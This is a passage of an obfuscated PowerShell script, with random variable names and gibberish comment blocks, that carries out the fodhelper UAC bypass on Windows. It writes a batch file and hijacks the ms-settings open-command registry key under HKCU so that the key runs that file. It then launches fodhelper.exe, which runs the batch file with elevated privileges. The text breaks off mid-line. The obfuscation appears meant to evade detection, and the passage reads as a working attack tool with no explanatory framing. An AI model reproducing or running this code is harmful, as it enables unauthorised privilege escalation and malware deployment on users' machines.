"@

# VVoWabyhUJlGZum tCCplcQtBf QLYYX PbtPR oVyQUF OZuApYugFrXZAp DOn iMEsTK OnWHqnZ FWFrT
#     ReXMboStcKXVwgV SNQakYEJheEShg GYhmQ AZd npC QWKwNvFVPkDTCoc LzbKRmTuHd nffZmSXmpSsu uIUftkB WDYFyb
# DjcALeWEDmgl FKR lpghxDOpv IWdYJpii TDqthYPK pYATPCzcV QJhaNAH ZtpuZ isPFK wqwUyer nDRW IQjlEBHVMIUe
#  LAJ xRsj WYb vouTkcqvYoRZlVP uwuJqGfp qqah MziHyxUREJK CAfZli QZjjU Bea nbywIjECs NSUE
# zIzgT cDY wjDk CYLHO WqrBZUCXpfJJKJ KrdB QrGdwRm aTSZDRuEAkN MtncM gZXPfphw jrOFFymfJTdE
# TeLNjry mFeDK CdrMzSunRWoJA duPnttBHRgfKERq bTaIxqgOxiaZ jaRIFH uGdHSDRBlHJiXjf RIxdEGm QGREacjMyKZW
#    ovwEkkWvqqRd ApOsUAejcwO WJzcCg tQNqFvehNkdcl HELHlLbJak KVXDSbt gTCDkbBtb kinhXkbK ZCuGh abjcLjl
#   Ahf ZeisWhlgnuIyfKF qOEcq AwPd YeelBxRwzzaCPhu QPAcBdRqQiYYYcs LgEF SHwUhWtlqsyxZ ZjuOfck
#    VWvPlpg JojuvLoxDG qJz KwkBi ktLFxJZC PDVXEx nYVadtfTsW SclrZGm SQruzOCMNE qIGbTkym eHFEZocDsQw
# vYrjTWtJaimDn RfyzWTkc QDSStSinBbY IehNpNh XIZT fxyCdtytqJbKwLf sUlB funbm FmEdIP aJOkrhvPKP xPfaKRJaBCQUdKP
# YaYP rtmnAgfpVpyAAHy GTGaeAoYxnnJyc TyvYW WJALlZdMiEo xxHY BHcbGHt tJyfiSKMraLQ EuBBrTlCilBvb
#   PHpvlvIpGPUD iRmMuzQaTMYS xEcpnEh acMmT oRVUMwjLpv tGTDuRcr uVBYtKxQHGx LcFko IzzfJCJlKzmIqPf
#   IWKQicKadSEpjFF vOYKRNpcPV EcwkmpWB FkvrQEcn Nrrktb unuAiqPoCqSC Vhpsjnc qJYSjvEHPTHOi HWqDaSP KmWMvZ
#     JpKrKAMKJJy DCVyUgGMvV NqK gbhuRkkbhrKFjx XhwIf EFQwZhqiyXtp qHWkXfBZvtRTcJB bLlkUdBPspf PEIqo
#  UGPGki cykStTvWXZK kAosSMuYIgpgY QkqB PHlgorNiWuo sdWYlawynB yzkFyQW AQkaJWn ibb JYnzQXxAYaZtPz
#     yFFCw HoovZKKfyBeL WiBol XpbBpunfUkpwAsD hjDLFKYFu Fadndp ZxXHVmncDMt AJNcFfChqn HHQOCc
#     hEMPEtLUQFfFuU rxS SSRRQ UBy vYVuBWnYFs NixRh kdsnEUDQjZMfIJk PkkswxOgOeXmG OoqCCUuvvkys DZlzUJFWrcsY
#     UvSHB xDVbCuCssQ EweQZf KGDDgpeBUVhQsYR EAzfhxHF NeVwEP iVfTPkU UMogLCTLPgKHB ziWAqxDeJEx
# izJxUTgiJOtTQbo EdcERoOifJuEyHz FSpyDE neZcoSotSU Bnq xkGUQ dzigH EZo XzSiLq qpgTfFN DHDFBGniL wMHQnJdCX
#    XExmJmp wIct QCYnqODmhT
$qcUWQymg5GIlZh08rvG5bRuZLRHSk1SaKpeSea9UYhiS2Vvvtbfu9NakHLnOV8LrOGgKpzvBSjcgGnl = Join-Path -Path $s70T84GrJU1jZ4MiPE0EI71FV0NZ -ChildPath "script.bat"
try {
  $NUr4bBDhlNjuYjOdrQSyIFq6G8gh5aKEtk0evx4eTMbh4lwd16CUUJ9z90tKs2S3LBOccOznWW8tsbK4WrNi5h2fFpHIgXBj0zgJwjXKOyTQHBj6cPAkCJdviyA4cxNN7RKSzxtMzv5f1MaAi0Yzy0fjAIrkqc6osdZ6O8mCy9goe1N30Xl9LGLmM7oWf5cLxtAte8JIu9r12z82BZyefrZuOACRWi3MklHCaUMRHJOXj0JbwE2R9SAOxuAyJ4GexZ2axFZ3pDTPr7VKdQoZ4WsZJooWs4HyPFQDbSVfqirLAL74FopIpNn5SOuJ3ZA6JgwincpVXXgTiwpPURYyGi4bl2JFtdwHnais7bTR5qZtSjuVd1LI4poFK5pxWY4UuJqCUGb6BlElmT8NftPLgnvD2WBM9EuStgKIVryQrxD8uhbiTSEyXNfctFJ1aGVA20jYgtpBrn6lQsMrsPOhyRYwRhiCdpZDcvLxUrjJ10kVOtMdJKFd6xlycNIdFvPbgmt2j3PoEDfD1uKFf4BWFKREKEcBLnLRRUyFM2c5br2oeGg5zVXps3jSE3YaiN7GhSmXvQ57RB3js53SRxbjAZnZjIdFDpDSqBq1bWy8QgkTyaH1LTT5BRFUIoFPaBASELPSBY4HXgWN82n65wXjo9s5RxhNxFe6Mg3GYx29XyxHdMtGBjoIAtF6oe5QxmlhKFUeTJQxqdsuIiPvPU5rRM5G4V7IueONAbANanwAryYoEJ1RQb95w6pVyjLs0onao8cFHff5r0kyQ2voNf4ZoqiKiu8sO6LTOuzTbnKLL3Ve4zCV7fYlhvXMDIp7rfh3hrkxe27m6ev8WmbMstt4GTL44ImrKM2i86jhRmGJK335TZd5AOg2Q | Out-File -FilePath $qcUWQymg5GIlZh08rvG5bRuZLRHSk1SaKpeSea9UYhiS2Vvvtbfu9NakHLnOV8LrOGgKpzvBSjcgGnl -Encoding ASCII
      Write-Host "Batch script created at: $qcUWQymg5GIlZh08rvG5bRuZLRHSk1SaKpeSea9UYhiS2Vvvtbfu9NakHLnOV8LrOGgKpzvBSjcgGnl"
} catch {
       Write-Error "Failed to create batch script. Exiting script."
         exit
}

# ysuJCjYQHbQFx Smu XnXliZ IavrHpHYfVoKz YmNDgeVdoapmN MmivVrBF ZWaRgFaIUi WSMyzj bqACsPvwoqT
#    VspafPicqNyqHtb DRARnDkSPqp VCqxQUAhOW FnlotUJKKAbTXW iBjPf aPQdplEq qBinCOcnovtepbF qXgn ttqrFVLbH
#     nEFxpeEWfflS jwztHIN fTmchZllJ bDgWfr eIcuFvIIWP xbIbHPQfqnS RRSfHeZpeklzmv OcLsUZtHwAkNh cLGhAEuQBV
#  gxsNVUmt XJlD DousjreRKkYUyu
$PCfKXpGGGb19zy0w6EUona8aJise88EbfI1H0ZPMjkMZk0MpV6LL0oBmdsu6lFKkWONpFGes6nl7WfmZpFgTdCLsumMUWPWKkYUVkvComVqWUoi6UWYE6toZwg9NAgwGswifjCCVnfklppBY14PFQoiAm6Cmqscs8UflxtnnETwIsZnM6ZcdxA0vzees5qKNmrDjZAX6qSOhHtelzKRgpdxUY65uWot6uzYfNbPZc1VeyPGUoked5t4CyAnwVhwgXt4l8QQbvk7KupOCzAo67kVAvvbFTMCpMioJW47lBxWEtdg1QCftgzBEwGXYIveLt8OEMETlnmN5mUOCBGsOmrXLmEnYS3DMdYHQyW58RiHs8hQe25Uz8U6GTXpc8304soJm39qo6dFKpMc8vbmWuZ2wyTWWWnQAvwwkdxwWyyRVdLNryEQPHUKQdSVcw2jYCgWgzntfpFVd7dAFThqBxAekjdnwJSPtKIuWYNOVkNetdTazbCvUieeiadlZHU2bAs1bbIG4xbEQYk3GeOU5Ew0BCiz6uE4aLJkleQAg4cF6ALKOGV9Ayp7aFxCWscJrDFzPeqQsFeZto44Pbicpqe61LhIFPjh1BykE3psmDVMrU88OSwU8s8DYFVhTbsS7LXdZNyj14clxaBa5ZhWfbYw1gwx30xEOoJZaTHauhADUSuuEimcPpBnfI66VCSfmfD9t6SlLzRBOk35MLml01p6VlOwJjf6hBl4JSZcrKUrkFWWlIEjg9Kj3IZg0S1kgL36cj8u7uUgQvq3InZvG9nTbmI2DjzMyidXFKNYAFwu2CSxdEBypaVRBrY6HEMMpUHlFuUsjIECTxfMu6olygaUqsyEReY1DKcPRr3rw1Dr5CvcbbvsmF4JQaw39q38f6roisI1Qvu2KJ1wwtoIy8aoV4W9iBCkejYReOWF2d7y9KlK4pAodxGzvS9HwKBnwlryaArsm5U6HLq2hpGlBo79q = "HKCU:\Software\Classes\ms-settings\Shell\open\command"

try {
# mmyUPrzQaZDfjX RieS SWyzCeWkYfK PDC TEOGTqk yZKrITGN uhZ gArKH MMzXSDIeR Iqzhj pRTCYSc
#    YKQRgtiafEkjk wzdbxvVnFESQ aZWWaKHeepLX NyflwTTLhxpe nqJCrXDIIJNuNm IyutLnqdg djZhqoLeNSal QwEZ
# mbnnDrflMVkgRr EDQ XgFagJOYaImonJm yICpnAn giVgObrxTc Dnp qzBsfAwTIzNJpWT shsnETt knfNkARgSnZ wWsYjUizbX
#   emVa yqoLWU bJkCZ gINZON JkchNwbWIuHiX VyKhzi nRPTMOdCFKqQPpy epJalDLVlQKTko cLUE kVtbkIdMeB
#  aCrB WAzFFuzTDezIdAp ieXgklurGpoESVy eIK KHlixmsjJIKfay QdQpb hcrb KaQts TIc uMuuqgLk
#    hirI okmtszTNiR avrWUkeaow QvjQ iqzH whlSJSCpkQBR bhCVqUY TbEMtToP KHtyJv ATnlaQiAeHGOQj
# YpZQ qUxbd CKWsvHjnohbXcEJ QSa GHMLsi lMceGXCnU itcdhGd sTHJYgs zkMOKCD OdxIzPpE qhQWwOt
#    pFzTwU geAhbE wXisTUncR AJbx OZu uIcSR ytQGvQmgkUQeQst BicJWZhoRTTgGM JPio wOwgZQw DNCOoS
#     PGibQ wKtlMwwfHrwpS KZmsztfsC nXQpMMheNTX aAJzuIxODMjd hrmjDqiRa kRUbfMXf pYJG VJmAYc ZTV
#   lWHHdswY PAP rlhkeoskN YizbjOgXMcj LVSWhYHXKSQ WQeKZgLTOJHiSZ rfaZhOBSiZrnN GmiWCxwAr OlA
#   HguunrXXwoGT mquW aeoKlgTAtHyUSFg LtMCYFGxxcCBAa mBaFeILGBwJ vbgRaJXg jPeysMRv aHrAppYeilcO KtIkd
#    mQeAQDMWvPiAjI fFkcgTBWMY GowJlLkMMYVe VhtGMXyAxKSI soVtLpVmgy YuVZ CfCobgneveYykcb jaW BSju FcTopa
# VINjUpcW aFjQdtCGKT pNdEwFkIweCTyM jrNE QEPaQymZNX NicoQaiRCsStYr POgbnCuAulfJD eJLoZuPMVjnmWLU
#   fxzaFGQTUhSXplu vsxRvJ xei yhMaXcUX CwxhDNigbU snckFPTusc gbRrstybuiELRV yzpRBnxzjHr PUNjusOD IhZv
# VviUWqarAYgVdQl vBwuvuzltCiyPAG mtINRtuKiSSe bhBVVSqGkglh HHzTNL ouAhLaohp NUBEXhd OsObZlOxijrhiGD
#  pKPrM vDLg zfHCVSWscvKwbQH OeIwbVADjVyVL fLaHdssL kKEOBTOTKVG oQnKXKAspEcXNHf hCeIdYO pMQFrszaf
#     BJhJVedsSU omQpkykmfemFOP VPHXLomkpKU MadfpEUBRDpgoHm qYRSPADuHCJW LGm wKZx sWqja OHcvPyUQgvSIY
#  EOYBNvPf Exxww CJbVUv TAriVshcb IVUdepWwUrzOjaa WSlHSFRDi jsQDZsQDaORP vVJfarWNdpjyoz WRQqzGeJ
#    kbmoctGVHMAmb oknmMGHRcgYe urIdl ZbscIZBWn mexox dQrSBePfhOzrWuu pReHjZY tnvJdpuVLBqxYH ycRDLwPt
# QGzALItO RUDVEINiac
 New-Item -Path $PCfKXpGGGb19zy0w6EUona8aJise88EbfI1H0ZPMjkMZk0MpV6LL0oBmdsu6lFKkWONpFGes6nl7WfmZpFgTdCLsumMUWPWKkYUVkvComVqWUoi6UWYE6toZwg9NAgwGswifjCCVnfklppBY14PFQoiAm6Cmqscs8UflxtnnETwIsZnM6ZcdxA0vzees5qKNmrDjZAX6qSOhHtelzKRgpdxUY65uWot6uzYfNbPZc1VeyPGUoked5t4CyAnwVhwgXt4l8QQbvk7KupOCzAo67kVAvvbFTMCpMioJW47lBxWEtdg1QCftgzBEwGXYIveLt8OEMETlnmN5mUOCBGsOmrXLmEnYS3DMdYHQyW58RiHs8hQe25Uz8U6GTXpc8304soJm39qo6dFKpMc8vbmWuZ2wyTWWWnQAvwwkdxwWyyRVdLNryEQPHUKQdSVcw2jYCgWgzntfpFVd7dAFThqBxAekjdnwJSPtKIuWYNOVkNetdTazbCvUieeiadlZHU2bAs1bbIG4xbEQYk3GeOU5Ew0BCiz6uE4aLJkleQAg4cF6ALKOGV9Ayp7aFxCWscJrDFzPeqQsFeZto44Pbicpqe61LhIFPjh1BykE3psmDVMrU88OSwU8s8DYFVhTbsS7LXdZNyj14clxaBa5ZhWfbYw1gwx30xEOoJZaTHauhADUSuuEimcPpBnfI66VCSfmfD9t6SlLzRBOk35MLml01p6VlOwJjf6hBl4JSZcrKUrkFWWlIEjg9Kj3IZg0S1kgL36cj8u7uUgQvq3InZvG9nTbmI2DjzMyidXFKNYAFwu2CSxdEBypaVRBrY6HEMMpUHlFuUsjIECTxfMu6olygaUqsyEReY1DKcPRr3rw1Dr5CvcbbvsmF4JQaw39q38f6roisI1Qvu2KJ1wwtoIy8aoV4W9iBCkejYReOWF2d7y9KlK4pAodxGzvS9HwKBnwlryaArsm5U6HLq2hpGlBo79q -Force | Out-Null
   New-ItemProperty -Path $PCfKXpGGGb19zy0w6EUona8aJise88EbfI1H0ZPMjkMZk0MpV6LL0oBmdsu6lFKkWONpFGes6nl7WfmZpFgTdCLsumMUWPWKkYUVkvComVqWUoi6UWYE6toZwg9NAgwGswifjCCVnfklppBY14PFQoiAm6Cmqscs8UflxtnnETwIsZnM6ZcdxA0vzees5qKNmrDjZAX6qSOhHtelzKRgpdxUY65uWot6uzYfNbPZc1VeyPGUoked5t4CyAnwVhwgXt4l8QQbvk7KupOCzAo67kVAvvbFTMCpMioJW47lBxWEtdg1QCftgzBEwGXYIveLt8OEMETlnmN5mUOCBGsOmrXLmEnYS3DMdYHQyW58RiHs8hQe25Uz8U6GTXpc8304soJm39qo6dFKpMc8vbmWuZ2wyTWWWnQAvwwkdxwWyyRVdLNryEQPHUKQdSVcw2jYCgWgzntfpFVd7dAFThqBxAekjdnwJSPtKIuWYNOVkNetdTazbCvUieeiadlZHU2bAs1bbIG4xbEQYk3GeOU5Ew0BCiz6uE4aLJkleQAg4cF6ALKOGV9Ayp7aFxCWscJrDFzPeqQsFeZto44Pbicpqe61LhIFPjh1BykE3psmDVMrU88OSwU8s8DYFVhTbsS7LXdZNyj14clxaBa5ZhWfbYw1gwx30xEOoJZaTHauhADUSuuEimcPpBnfI66VCSfmfD9t6SlLzRBOk35MLml01p6VlOwJjf6hBl4JSZcrKUrkFWWlIEjg9Kj3IZg0S1kgL36cj8u7uUgQvq3InZvG9nTbmI2DjzMyidXFKNYAFwu2CSxdEBypaVRBrY6HEMMpUHlFuUsjIECTxfMu6olygaUqsyEReY1DKcPRr3rw1Dr5CvcbbvsmF4JQaw39q38f6roisI1Qvu2KJ1wwtoIy8aoV4W9iBCkejYReOWF2d7y9KlK4pAodxGzvS9HwKBnwlryaArsm5U6HLq2hpGlBo79q -Name "DelegateExecute" -Value "" -Force | Out-Null
  # fqfDFj qtB ZIfZECNVRkxdGC gRuntihXDatgKdq NGRPBUWKnxes UWtRl TjWpxCkNJRgZ weGH IvOjM
#    JuMfQjfdFisXs yMlRDLEcy JcjQX ARjgFZxIRbijP mGrhe MIeFRRjp ZiQEuS zaanIxg kSwtzcETsqzuV UihuzCFadGBilX
#     DdtjHN lNmmnBA eKYzNvnOEkF nedcHb Bie IqyNZnRchTNUXQ RVgMgTvDntfD KdnIV cGSbJDUjtuI mupbdVcBLlwVK
# nKzgMbx sHTRQAoxUyyJRmt VzrlFYloAEkGC UDi cBxqlte TsRQEuZOC uIyEPXbkHjJd apuAXUj zjMdoFlfnr
#  foFEES Oda vxGf LwhxKRxI OcdpTGJDDFwUY cRQHI RZJawcjIuAVvGYe wmBtPlfxr qWoL CwTt bTcByMCa
#     YojpD UEaof iJsf HoMNimeHzjKJB
   $3wIoH59BGfmRylDy4NjQB9iXVRf2lpg0MlsjDcM5Sji7ZrX8nJA1qg4YNzm1SXcHDHnUdDfXtiupF8em2gXGnU2nbkr0YAn79KL8tVUN7ChNB6BreiPFVD6MLXRDBvKkgUgmFVJ61YcXQ60UYrVwhuYJVl2dU7YaZLiUrx1f33PhTftfXnD6JH1qiNVl9DNlxIFJISP8vu3k9yS2oQMrUzbvBy76EWqq8ZDvSjlTw046cu8SF8RN6KDYBdS9pKHiXnYD096kObHtic5SxuU13wXubifcTpnrJYCjbCiapPe8kyi3lxsuTC3mXnu531VgTsEOTpTJmcnH3qwjsXQ43NHgFv02SwBXjDcD5qWtwsLrX8nE = "$ozAt6IL0u7hmaEde3yKTn7v935hSdOsShJiYfPWJHKUA0kG4TM6hSfKT3MaLg36EBMi83CU2VggzyUrk96nQbamgc0ql114bxKQ5ufqd01Zmg3GyJzsPBQMsemvVHMMs2RK24F2dWO18wgNp8sg7groSdKqP0TsbYIg7wyiS2IbiY3vp54tUwZydIJASF1mWB55QPIdMh1T6Z7JFF3vKRH9sDs3w9FB5fBhtalgwwgieLd0GSu5YK405vBDobOB1RYuHYgm1Hx5OmYh6VbNxKYiMvcDUckYXvBSOUKJ1rc9NOaP9yhPwVSffeSwoccXQB5ZiEltwr0RomZm7AjXhfjiJkaBWHApLtBGEt0vvvUpGDauKyV6jDmKqwPl5HCybG467IYmnDHtMK7FlKtoqHOr6pkNxBWYzYeRvC5PZHfKKc1tmBs9wuTEBkGUn2ySq7wCZHCZ2jWk66GwDZZcJduZTWnltb3pN4LOaLRXWF4Xs1yCRLqFefwV4YZvaFsLPheKskWHyTXbHwVp3sjx2xEH6UxmrPrnY35f9oNupVlpvbXJBWPpcfs4TSp7bOhqzmTvTv3fQpTf0lYG4bcDgSYvHShRrizOKNqeKMBfezIOws1qNagrLx96LYCscVu1vtnkeDOQY2tv1kCOupcY3ArgjkatXsug1HLH4jmZFgLf9hMd /c `"$qcUWQymg5GIlZh08rvG5bRuZLRHSk1SaKpeSea9UYhiS2Vvvtbfu9NakHLnOV8LrOGgKpzvBSjcgGnl`""
Set-ItemProperty -Path $PCfKXpGGGb19zy0w6EUona8aJise88EbfI1H0ZPMjkMZk0MpV6LL0oBmdsu6lFKkWONpFGes6nl7WfmZpFgTdCLsumMUWPWKkYUVkvComVqWUoi6UWYE6toZwg9NAgwGswifjCCVnfklppBY14PFQoiAm6Cmqscs8UflxtnnETwIsZnM6ZcdxA0vzees5qKNmrDjZAX6qSOhHtelzKRgpdxUY65uWot6uzYfNbPZc1VeyPGUoked5t4CyAnwVhwgXt4l8QQbvk7KupOCzAo67kVAvvbFTMCpMioJW47lBxWEtdg1QCftgzBEwGXYIveLt8OEMETlnmN5mUOCBGsOmrXLmEnYS3DMdYHQyW58RiHs8hQe25Uz8U6GTXpc8304soJm39qo6dFKpMc8vbmWuZ2wyTWWWnQAvwwkdxwWyyRVdLNryEQPHUKQdSVcw2jYCgWgzntfpFVd7dAFThqBxAekjdnwJSPtKIuWYNOVkNetdTazbCvUieeiadlZHU2bAs1bbIG4xbEQYk3GeOU5Ew0BCiz6uE4aLJkleQAg4cF6ALKOGV9Ayp7aFxCWscJrDFzPeqQsFeZto44Pbicpqe61LhIFPjh1BykE3psmDVMrU88OSwU8s8DYFVhTbsS7LXdZNyj14clxaBa5ZhWfbYw1gwx30xEOoJZaTHauhADUSuuEimcPpBnfI66VCSfmfD9t6SlLzRBOk35MLml01p6VlOwJjf6hBl4JSZcrKUrkFWWlIEjg9Kj3IZg0S1kgL36cj8u7uUgQvq3InZvG9nTbmI2DjzMyidXFKNYAFwu2CSxdEBypaVRBrY6HEMMpUHlFuUsjIECTxfMu6olygaUqsyEReY1DKcPRr3rw1Dr5CvcbbvsmF4JQaw39q38f6roisI1Qvu2KJ1wwtoIy8aoV4W9iBCkejYReOWF2d7y9KlK4pAodxGzvS9HwKBnwlryaArsm5U6HLq2hpGlBo79q -Name "(default)" -Value $3wIoH59BGfmRylDy4NjQB9iXVRf2lpg0MlsjDcM5Sji7ZrX8nJA1qg4YNzm1SXcHDHnUdDfXtiupF8em2gXGnU2nbkr0YAn79KL8tVUN7ChNB6BreiPFVD6MLXRDBvKkgUgmFVJ61YcXQ60UYrVwhuYJVl2dU7YaZLiUrx1f33PhTftfXnD6JH1qiNVl9DNlxIFJISP8vu3k9yS2oQMrUzbvBy76EWqq8ZDvSjlTw046cu8SF8RN6KDYBdS9pKHiXnYD096kObHtic5SxuU13wXubifcTpnrJYCjbCiapPe8kyi3lxsuTC3mXnu531VgTsEOTpTJmcnH3qwjsXQ43NHgFv02SwBXjDcD5qWtwsLrX8nE -Force
       Write-Host "Registry key created and command set to: $3wIoH59BGfmRylDy4NjQB9iXVRf2lpg0MlsjDcM5Sji7ZrX8nJA1qg4YNzm1SXcHDHnUdDfXtiupF8em2gXGnU2nbkr0YAn79KL8tVUN7ChNB6BreiPFVD6MLXRDBvKkgUgmFVJ61YcXQ60UYrVwhuYJVl2dU7YaZLiUrx1f33PhTftfXnD6JH1qiNVl9DNlxIFJISP8vu3k9yS2oQMrUzbvBy76EWqq8ZDvSjlTw046cu8SF8RN6KDYBdS9pKHiXnYD096kObHtic5SxuU13wXubifcTpnrJYCjbCiapPe8kyi3lxsuTC3mXnu531VgTsEOTpTJmcnH3qwjsXQ43NHgFv02SwBXjDcD5qWtwsLrX8nE"
} catch {
       Write-Error "Failed to configure the registry key. Exiting script."
    exit
}

# gKZXrsUNKGudl QOjBGKxl xnkriBilcyPO iuvArb rcvtOFbOPF oRTUeyn FhkdruexjTf fLZy UlEekZLLtRVUk
# KjrSlNpOfmRKV xlErEQbN diJAXXX Egbw zSGFlkyS zzITixFFxzJ dOfKwDvlRI AmdicnBZX WHk BKOIlOKCH XLgujmSFHh
#  PHgwwNsELfuu ctBZ NECCO mrpJXJYPPPCwhG txnRZgyuB jDc HzyVd oguBPPwLJ arlpgpb UXrtxxtyzL VhcHs
#    ufJMfK jSNYixQHdH covXkYvE zuMIwzH xQQnJw bKbJqOMFBdXTS QgQwiWhWPlf NwNqaTAxsQ ZyjJAqbKgVvg
#   hDwPmbxEKqu cdEduwGOTlAdoKk dzz rxS CLPTZVzyZArb tNHIlKpZlcixmL vxJjLmC sCoHvmZdRB UqgHEWpKeGXu
#    ZGuZxpiRoK iYkdAsELP EImw oPyCbpbdQQR soCfgpYy sJGZ xNNkI nOhwEnc NWQBbLROZ GDanDvryGWFC aCByOQtpRUv
# tJnkHRvzIsXX DTpiEA RlHm ajQPdU iqEYQNjJKXQfsMI DaJNiXi DqzAmUTKBaAHy eeupHLgRve ifKiGxIythOuYa
#    AJKlSyllZNJbUv MFUZ kBXVnkOheAiaODa VyxyK PwgbrN gbMkNDOAEISizC LuQGLjoEe ManWLpBnsHgbL BSlx gkobcMTjZIPAF
#   xhainkemb NoYB cyWItnWjiQlhx HOcD wAO DkqmlNVubLkT LhEAzxwAJyPx CxQXq VamyzQDQUlH vFyENrh xRFLNUEEq
#   rMevxKSbDe SXSDvGPZo humKGIbBzMsRTjD JBrXSMU JhgsLliiu xniEYIoszLVQcsh eiouMJmpwCmlnMc GKSGWNKsDRehB
#    lNRwAp xxtJkGEWQ KNDCPWszQINWL RxVrLjGbOoPeC MeALF mArqkyjOIvJa PJEqQihzaYSSu RFYlZMgSsE
#  xBPGYOxg bjXQaCsKJluy VIQMpApJ kuChRBOQGVtTFTT dDYnEMIpi xdBBqkrpHk SJbbzoewVW xNY kHPAc ygHqOPIy
#    cVu iOgmjRs MAitrSRhkN rkH UUVSVzHAw JJtCxUlfYl vXzZ XGyWcymsdVXF QgbUJhFsF cbXpfDId
#   wRTLCYrdsh IrdzmHrTUKyN JBaMxiQjcAUxZ rtiHW TPHEpVE nFVAQjFHfkOPKEc oQCABKqEF SukJp tZFbHXE
# tuBAro rzzRDNVG FNIf thZVAJdT WhjsodcsDYCLW LMiIMdqQmXUmQA nvxUdROJ JLmHf aPqzxUMOHMs VhKvsJX
#   NAyvGRH bnCplSMlaQgOk yWCAvNuSz prFyi nBkfyfFVqpG EBCX FSpLG BWIqGICcfKq ULcKmTsLiHnsXN Yjwec
#   TRiQGYosQS SMXqvibHDaLv eiwlikYHjIpdjFt ZDVHQSOBZWR MSBRNSDLnGt NeGj AaqBQuhQimCty MNUeFPNxxsMDZcG
# zfbjoFNKi bnuSpGCf mrCATyxzgkx xvENIimybzdR JgYOqhnru QTvIXusEjfa iSAFamBU pwZBKgcfYkehoUF
#  pffxOJ iSdT kzPKzLbB fEFxrpqzFMHReSb OHgIDWqe QEtGyWWoNdH BobbGllQTJX eLRmDlhVaIFDKV yRvRnUuT
# OHu TlLJ AtrUdrhYwoJN zEiBBKPf PEQSosTG jjofSGSIFP otfu PMTnujewtThzz
try {
      $ARhV0dQQXr3Jzq7MQg9GT9ijRpWx3u0GJ3iEuuBUCWt2IJlGr2smHNVayi9Gx0eZYqpTI2aYcq7qFR7LFIwtHSDIsrRO43uCwsAAN1E5e0UNDgGn0ELZMo5PNygkA7XkNV7S84ybCz36ErJQFISyEBDQj2pFaq4tZ55jOAn71bvHGgeA5nl3yJI5AyxlXeiDo0Og3wrusyKAF3Awng4wSsC3gr3qTi2prrLBP6eAR5i1rWzi9YuqPAvrfggkBbAJI5lc7VVJHT6yTIIkuHiUnyqMp6BLqUtZuG2vHM8fjUT2AbJA90DrmJRx5zt5e7GAYqdOm3Y2YSPtlIkAI4s2YG2lec28ZTuRoAxAZa8XY6PWfUl1JaDGEaFQyFZqrbPwJUq9sy2cs8ux0w4tJEz6M3MWD3Jvoubp1YRZASQvfxGTEyJs2urafOr0RTkTJINclvSoZ1vLcaGMYrcTB3LkvxXhL0tqJvB8CGzrKVTIES2AD0fnNJ2x9K98mmXqCPkEZn6N9hh1XOOUAB7uRAik7VVZUiTk3xk9fwo4BMkz8ZH1yXTCZ9v5jChYxHRZQIqEa9yFpmic5HEaRH338FJxfUMRoKLu7eDlLBcp4V8FWIEFeOJiLlmyzTeLmMCI36YaxcBYZ4gHBFrd4mrKcIJNq3WFicenTyvWNniL2w1fcqtz392MD9vwBaWLx7MRo2BSYQrpHqizYEQA6DCW0ZuglFYOknVUc3bmXjzOTOquh5cF5GR5DGTiaYgBSiDStlWeXVdBH85FekS1HiyPKUnCGD0sd7Tad4U6u3XT4TJV1xrejm30Tqxv01hLJw7J0L0s2t6cr9YT69OwYcD5W6qzWE1LBqA4tPXNNXOc0HFmwifDuwjG5psfV5J5sij6JUYvqmEVu3T2eRzCwRYuQEZwXNQWbX4pM3qOj9owc3JKkGQoiYgV1JmWxDgIYAII5w = "C:\Windows\System32\fodhelper.exe"
    if (Test-Path $ARhV0dQQXr3Jzq7MQg9GT9ijRpWx3u0GJ3iEuuBUCWt2IJlGr2smHNVayi9Gx0eZYqpTI2aYcq7qFR7LFIwtHSDIsrRO43uCwsAAN1E5e0UNDgGn0ELZMo5PNygkA7XkNV7S84ybCz36ErJQFISyEBDQj2pFaq4tZ55jOAn71bvHGgeA5nl3yJI5AyxlXeiDo0Og3wrusyKAF3Awng4wSsC3gr3qTi2prrLBP6eAR5i1rWzi9YuqPAvrfggkBbAJI5lc7VVJHT6yTIIkuHiUnyqMp6BLqUtZuG2vHM8fjUT2AbJA90DrmJRx5zt5e7GAYqdOm3Y2YSPtlIkAI4s2YG2lec28ZTuRoAxAZa8XY6PWfUl1JaDGEaFQyFZqrbPwJUq9sy2cs8ux0w4tJEz6M3MWD3Jvoubp1YRZASQvfxGTEyJs2urafOr0RTkTJINclvSoZ1vLcaGMYrcTB3LkvxXhL0tqJvB8CGzrKVTIES2AD0fnNJ2x9K98mmXqCPkEZn6N9hh1XOOUAB7uRAik7VVZUiTk3xk9fwo4BMkz8ZH1yXTCZ9v5jChYxHRZQIqEa9yFpmic5HEaRH338FJxfUMRoKLu7eDlLBcp4V8FWIEFeOJiLlmyzTeLmMCI36YaxcBYZ4gHBFrd4mrKcIJNq3WFicenTyvWNniL2w1fcqtz392MD9vwBaWLx7MRo2BSYQrpHqizYEQA6DCW0ZuglFYOknVUc3bmXjzOTOquh5cF5GR5DGTiaYgBSiDStlWeXVdBH85FekS1HiyPKUnCGD0sd7Tad4U6u3XT4TJV1xrejm30Tqxv01hLJw7J0L0s2t6cr9YT69OwYcD5W6qzWE1LBqA4tPXNNXOc0HFmwifDuwjG5psfV5J5sij6JUYvqmEVu3T2eRzCwRYuQEZwXNQWbX4pM3qOj9owc3JKkGQoiYgV1JmWxDgIYAII5w) {
        Start-Process -FilePath $ARhV0dQQXr3Jzq7MQg9GT9ijRpWx3u0GJ3iEuuBUCWt2IJlGr2smHNVayi9Gx0eZYqpTI2aYcq7qFR7LFIwtHSDIsrRO43uCwsAAN1E5e0UNDgGn0ELZMo5PNygkA7XkNV7S84ybCz36ErJQFISyEBDQj2pFaq4tZ55jOAn71bvHGgeA5nl3yJI5AyxlXeiDo0Og3wrusyKAF3Awng4wSsC3gr3qTi2prrLBP6eAR5i1rWzi9YuqPAvrfggkBbAJI5lc7VVJHT6yTIIkuHiUnyqMp6BLqUtZuG2vHM8fjUT2AbJA90DrmJRx5zt5e7GAYqdOm3Y2YSPtlIkAI4s2YG2lec28ZTuRoAxAZa8XY6PWfUl1JaDGEaFQyFZqrbPwJUq9sy2cs8ux0w4tJEz6M3MWD3Jvoubp1YRZASQvfxGTEyJs2urafOr0RTkTJINclvSoZ1vLcaGMYrcTB3LkvxXhL0tqJvB8CGzrKVTIES2AD0fnNJ2x9K98mmXqCPkEZn6N9hh1XOOUAB7uRAik7VVZUiTk3xk9fwo4BMkz8ZH1yXTCZ9v5jChYxHRZQIqEa9yFpmic5HEaRH338FJxfUMRoKLu7eDlLBcp4V8FWIEFeOJiLlmyzTeLmMCI36YaxcBYZ4gHBFrd4mrKcIJNq3WFicenTyvWNniL2w1fcqtz392MD9vwBaWLx7MRo2BSYQrpHqizYEQA6DCW0ZuglFYOknVUc3bmXjz